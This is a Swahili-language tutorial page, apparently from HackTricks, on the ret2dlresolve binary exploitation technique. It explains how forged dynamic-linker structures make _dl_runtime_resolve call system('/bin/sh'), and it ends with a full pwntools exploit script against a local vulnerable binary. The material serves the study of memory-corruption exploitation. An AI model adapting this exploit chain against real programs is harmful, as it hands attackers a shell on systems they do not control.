# Ret2dlresolve

{{#include ../../../banners/hacktricks-training.md}}

## Basic Information

Kama ilivyoelezwa katika ukurasa kuhusu [**GOT/PLT**](../arbitrary-write-2-exec/aw2exec-got-plt.md) na [**Relro**](../common-binary-protections-and-bypasses/relro.md), binaries bila Full Relro zitatatua alama (kama anwani za maktaba za nje) mara ya kwanza zinapotumika. Hii kutatua inatokea kwa kuita kazi **`_dl_runtime_resolve`**.

Kazi ya **`_dl_runtime_resolve`** inachukua kutoka kwenye stack marejeleo ya baadhi ya muundo inahitaji ili kutatua alama iliyotajwa.

Kwa hivyo, inawezekana **kujifanya muundo huu wote** ili kufanya kutatua kiungo cha dinamikali alama iliyotakiwa (kama kazi ya **`system`**) na kuitwa na parameter iliyowekwa (mfano **`system('/bin/sh')`**).

Kawaida, muundo huu wote unajifanywa kwa kufanya **mnyororo wa ROP wa awali unaoitwa `read`** juu ya kumbukumbu inayoweza kuandikwa, kisha **muundo** na mfuatano **`'/bin/sh'`** hupitishwa ili kuhifadhiwa na kusoma katika eneo lililojulikana, na kisha mnyororo wa ROP unaendelea kwa kuita **`_dl_runtime_resolve`** na anwani ya `$'/bin/sh'`.

> [!TIP]
> Mbinu hii ni muhimu hasa ikiwa hakuna syscall gadgets (kutumia mbinu kama [**ret2syscall**](rop-syscall-execv.md) au [SROP](srop-sigreturn-oriented-programming.md)) na hakuna njia za kuvuja anwani za libc.

Unaweza kupata maelezo bora kuhusu mbinu hii katika nusu ya pili ya video:

{{#ref}}
https://youtu.be/ADULSwnQs-s?feature=shared
{{#endref}}

## Structures

Ni muhimu kujifanya muundo 3: **`JMPREL`**, **`STRTAB`** na **`SYMTAB`**. Una maelezo bora kuhusu jinsi haya yanavyoundwa katika [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures)

## Attack Summary

1. Andika muundo wa uwongo mahali fulani
2. Weka hoja ya kwanza ya system (`$rdi = &'/bin/sh'`)
3. Weka kwenye stack anwani za muundo ili kuita **`_dl_runtime_resolve`**
4. **Kuita** `_dl_runtime_resolve`
5. **`system`** itatatuliwa na kuitwa na `'/bin/sh'` kama hoja

## Example

Unaweza kupata [**mfano wa mbinu hii hapa**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **ikiwemo maelezo mazuri ya mnyororo wa mwisho wa ROP**, lakini hapa kuna exploit ya mwisho iliyotumika:
```python
from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve)     # call .plt and dl-resolve() with the correct, calculated reloc_offset

log.info(rop.dump())

p.sendline(rop.chain())
p.sendline(dlresolve.payload)    # now the read is called and we pass all the relevant structures in

p.interactive()
```
## Marejeleo

- [https://youtu.be/ADULSwnQs-s](https://youtu.be/ADULSwnQs-s?feature=shared)
- [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve)

{{#include ../../../banners/hacktricks-training.md}}